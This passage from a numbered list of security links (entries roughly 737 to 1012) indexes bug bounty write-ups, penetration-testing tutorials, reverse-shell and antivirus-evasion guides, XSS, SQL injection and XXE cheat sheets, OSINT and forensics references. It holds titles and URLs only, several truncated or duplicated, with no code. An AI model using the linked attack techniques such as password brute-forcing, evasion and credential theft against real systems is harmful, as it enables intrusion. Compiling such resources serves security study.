https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ -913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf -927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: 